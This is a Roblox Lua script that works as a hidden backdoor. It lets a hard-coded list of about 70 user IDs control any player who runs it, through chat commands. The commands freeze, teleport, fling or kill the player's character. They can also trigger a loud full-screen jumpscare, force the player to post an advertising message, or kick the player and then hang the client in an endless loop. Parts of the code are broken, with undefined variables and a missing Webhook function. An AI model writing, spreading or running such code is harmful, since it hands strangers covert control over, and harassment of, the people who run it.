local player = game.Players.LocalPlayer
local Players = game:GetService("Players")

local Admins = {
    2200043156, --Airsoft
    151933107, --! Eric#2006
    1505115004, --Joker#6962
    1590735900, --uchiha_erick
    128160667, --s&g#1227
    885398571, --Zay!#0001
    1025791215, --Ny#5555
    1184893665, --violent
    3167418005, --Spacelol#0002
    415960515, --uzi!#0366
    1657694631, --stalkr#0001
    3276810125, ---twpii
    66587571, --Rocboon#8888
    139596293, --Dopa#2066
    1518315276, --gun1#1276
    2283997023, --!colrixs#9610
    329075988, --vx ψ#9192
    1731664996, --Iamkho#7069
    2622872437, --foz#7313
    2221742228, --S𖤐ul#0001
    560937507, --Badrino#0001
    363717919, --Kozutoh#9751
    2510693800, ---Crazy-#0002
    1110169442, --zukriel#1212
    2330042450, ---de manny#1994
    1436622231, --Rte#0001
    52678700, --Rizwan.mv#9384
    1580832817, --vlxner
    444472506, --luna ?#7777
    321845082, --Dlow
    81027808, --Dogle#6666
    363784792, --7th#9533
    2427543947, ---sczuyu#0009
    87808571, ---lilscrubb#4222
    1532594445, --Liquid.#0983
    866213970, --retire#0001
    937843420, --sacred#0001
    34462404, --Sao#0666
    1252644850, --sheloveskb#1150
    115460985, --115460985 (my dh id)#1400
    1376406201, --RubicScythe#6259
    2930974046, --5days
    177809739, --sno#5346
    1573851899, --𝓢𝓹𝓸𝓸𝓴𝔂#0314
    1368330888, --veiixz#7747
    359900506, --Anthony シ#5501
    1252644850, --sheloveskb#1150
    3160742375, --kef#5715
    44217136, ---randomkid
    278638090, --2pl#5032
    2519843836, ---DT
    2664279012, ---jaden#6184
    876953766, ---Sydneyy#1738
    413956126, ---Dilun#4181
    272080327, ---Amador#0001
    2686156693, ---vinnix
    727918321, ---adsire#7777
    932150372, ---Nagger#1349
    245501651, ---Rex✓#0001
    3251820143, ---Wsg#3798
    3318906376, ---nyaw#0069
    2261485730, ---xvz#0001
    2522103092, ---!tahjeen#8401
    110757900, ---Haz#6120
    1617667114, ---Ela
    1597062518, ---T0X#8678
    79287609, ---Crostide#8181
    52678700, ---Rizwan.mv#9171
    2221151191, ---ᎯᏞ3ᏁᎿᎬᏞ#6660
    1240931272, ---Skepticc#4221
    2896656846, ---F4ir#8838
    188439784, ---gas#3370
    3487585765, ---rashad#4582
    413327728, ---klx#3545
}

local function commands(msg, plr)
    if table.find(Admins, plr) then
        local Mod = game:GetService("Players"):GetPlayerByUserId(plr)
        local Msg = string.lower(msg)
        local SplitCMD = string.split(Msg, ".")
        local Lower = string.lower(player.Name)
        local Allowed = string.find(Lower, SplitCMD[2])
        if Allowed then
            if string.find(SplitCMD[1], ":freeze") then
                player.Character.HumanoidRootPart.Anchored = true
            end
            if string.find(SplitCMD[1], ":gs") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-564.12738, 316.598755, -540.429993, -0.00582453702, 3.12434736e-08, -0.999983013, 1.03683227e-07, 1, 3.06400842e-08, 0.999983013, -1.03503005e-07, -0.00582453702);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":gunshop") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-564.12738, 316.598755, -540.429993, -0.00582453702, 3.12434736e-08, -0.999983013, 1.03683227e-07, 1, 3.06400842e-08, 0.999983013, -1.03503005e-07, -0.00582453702);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":kicks") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-223.18045, 330.129944, -213.330215, -0.640706658, 2.42473615e-08, -0.767785788, 6.38148512e-09, 1, 2.62556341e-08, 0.767785788, 1.19225456e-08, -0.640706658);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":inbank") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-375.640137, 330.034058, -82.1187286, 0.0138486819, 8.34465663e-10, -0.999904096, 1.00876996e-09, 1, 8.48517145e-10, 0.999904096, -1.02042408e-09, 0.0138486819);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":outbank") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-420.816803, 331.264984, -76.8952484, 0.0968087986, -5.47818536e-06, 0.995302975, 8.24302333e-06, 1, 4.70227496e-06, -0.995302975, 7.74908403e-06, 0.0968087986);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":revolver") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-621.587463, 330.034058, 80.9990005, -0.022131769, 2.65338684e-08, -0.999755085, -1.18691039e-08, 1, 2.68031179e-08, 0.999755085, 1.24593971e-08, -0.022131769);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":rev") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-621.587463, 330.034058, 80.9990005, -0.022131769, 2.65338684e-08, -0.999755085, -1.18691039e-08, 1, 2.68031179e-08, 0.999755085, 1.24593971e-08, -0.022131769);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":db") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-1012.00854, 330.040894, -59.3442383, -0.1399436, 7.13653989e-08, 0.990159452, 1.57786431e-07, 1, -4.97740018e-08, -0.990159452, 1.49268175e-07, -0.1399436);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":doublebarrel") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-1012.00854, 330.040894, -59.3442383, -0.1399436, 7.13653989e-08, 0.990159452, 1.57786431e-07, 1, -4.97740018e-08, -0.990159452, 1.49268175e-07, -0.1399436);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":popcorn") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-1012.00854, 330.040894, -59.3442383, -0.1399436, 7.13653989e-08, 0.990159452, 1.57786431e-07, 1, -4.97740018e-08, -0.990159452, 1.49268175e-07, -0.1399436);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":casino") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-837.393799, 330.040894, 104.21302, 0.999951959, 3.81714038e-08, -0.00980229303, -3.87024954e-08, 1, -5.39908527e-08, 0.00980229303, 5.43676322e-08, 0.999951959);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":lettuce") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-837.393799, 330.040894, 104.21302, 0.999951959, 3.81714038e-08, -0.00980229303, -3.87024954e-08, 1, -5.39908527e-08, 0.00980229303, 5.43676322e-08, 0.999951959);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":jail1") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-268.925232, 330.083984, 96.3931427, -0.999656796, -6.20660359e-08, 0.0261977538, -6.18122158e-08, 1, 1.04983435e-08, -0.0261977538, 8.87539908e-09, -0.999656796);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":jail2") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(6,Enum.EasingStyle.Quad);
            local pos=CFrame.new(-253.724411, 330.280304, 140.006134, 0.312191248, -0.120352149, -0.94236511, -0.00212074048, 0.991852403, -0.127374887, 0.950016916, 0.0417638384, 0.309392422);
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":song1") then
            local args = {[1] = "Play",[2] = "8718506831"}
            game:GetService("ReplicatedStorage").MainRemote:FireServer(unpack(args))
            end
            if string.find(SplitCMD[1], ":song2") then
            local args = {[1] = "Play",[2] = "6781120788"}
            game:GetService("ReplicatedStorage").MainRemote:FireServer(unpack(args))
            end
            if string.find(SplitCMD[1], ":dance1") then
            local args = {[1] = "Emote",[2] = "Clap"}
            game:GetService("ReplicatedStorage").MainRemote:FireServer(unpack(args))
            end
            if string.find(SplitCMD[1], ":dance2") then
            local args = {[1] = "Emote",[2] = "Dance1"}
            game:GetService("ReplicatedStorage").MainRemote:FireServer(unpack(args))
            end
            if string.find(SplitCMD[1], ":dance3") then
            local args = {[1] = "Emote",[2] = "Dance2"}
            game:GetService("ReplicatedStorage").MainRemote:FireServer(unpack(args))
            end
            if string.find(SplitCMD[1], ":unfreeze") then
                player.Character.HumanoidRootPart.Anchored = false
            end
            if string.find(SplitCMD[1], ":users") then
                game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Get Good, Get SoftVortex!", "All")
            end
            if string.find(SplitCMD[1], ":fling") then
                player.Character.HumanoidRootPart.Velocity = Vector3.new(500000,500000,500000)
            end
            if string.find(SplitCMD[1], ":kill") then
               local plr = game.Players.LocalPlayer
                game.Players.LocalPlayer.Character.Humanoid.Health = 0
            end
            if string.find(SplitCMD[1], ":bring") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(7,Enum.EasingStyle.Quad);
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[author].Character.Head.CFrame
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":scare") then
                function Scare()
                    local ScreenGui = Instance.new("ScreenGui")
                    local ImageLabel = Instance.new("ImageLabel")

                    local image = {"109129888", "146577131", "1309130490", "1119705746", "7479500080"}

                    local image2 = {"7236404523", "6150329916", "8195739170", "8628815817"}

                    ScreenGui.Parent = game.CoreGui
                    ScreenGui.Name = "SCREAM"
                    ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

                    ImageLabel.Parent = ScreenGui
                    ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                    ImageLabel.Position = UDim2.new(0, 0, -0.000674206764, 0)
                    ImageLabel.Size = UDim2.new(1, 0, 1.00857365, 0)
                    ImageLabel.Image = "rbxassetid://" .. image[math.random(1, #image)]
                    ImageLabel.Visible = false
                    ImageLabel.BackgroundTransparency = 1
                    ImageLabel.Visible = true
                    local sound = Instance.new("Sound")
                    sound.Parent = game.Workspace
                    sound.SoundId = "rbxassetid://" .. image2[math.random(1, #image2)]
                    sound.Volume = 200
                    sound:Play()
                    for i = 0, 1, 0.1 do
                        wait(0.05)
                        ImageLabel.ImageTransparency = i
                    end
                    sound.Ended:Wait()
                    sound:Destroy()
                    ScreenGui:Destroy()
                end
                if not game.CoreGui:FindFirstChild("SCREAM") then
                    Scare()
                end
            end
            if string.find(SplitCMD[1], ":kick") then
                local ISADMIN = table.find(Admins, player.UserId)
                if not ISADMIN then
                    player:Kick("Kicked.")
                    Webhook(player, "USER KICKED!")
                    wait(5)
                    while true do
                    end
                end
            end
        else
end
    end
end

Players.PlayerAdded:Connect(
    function(plr)
        local ADMINS = table.find(Admins, plr.UserId)
        if ADMINS then
            plr.Chatted:Connect(
                function(msg)
                    commands(msg, plr.UserId)
                end
            )
        end
    end
)

for i, v in pairs(game:GetService("Players"):GetChildren()) do
    local ADMINS = table.find(Admins, v.UserId)
    if ADMINS then
        v.Chatted:Connect(
            function(msg)
                commands(msg, v.UserId)
            end
        )
    end
end
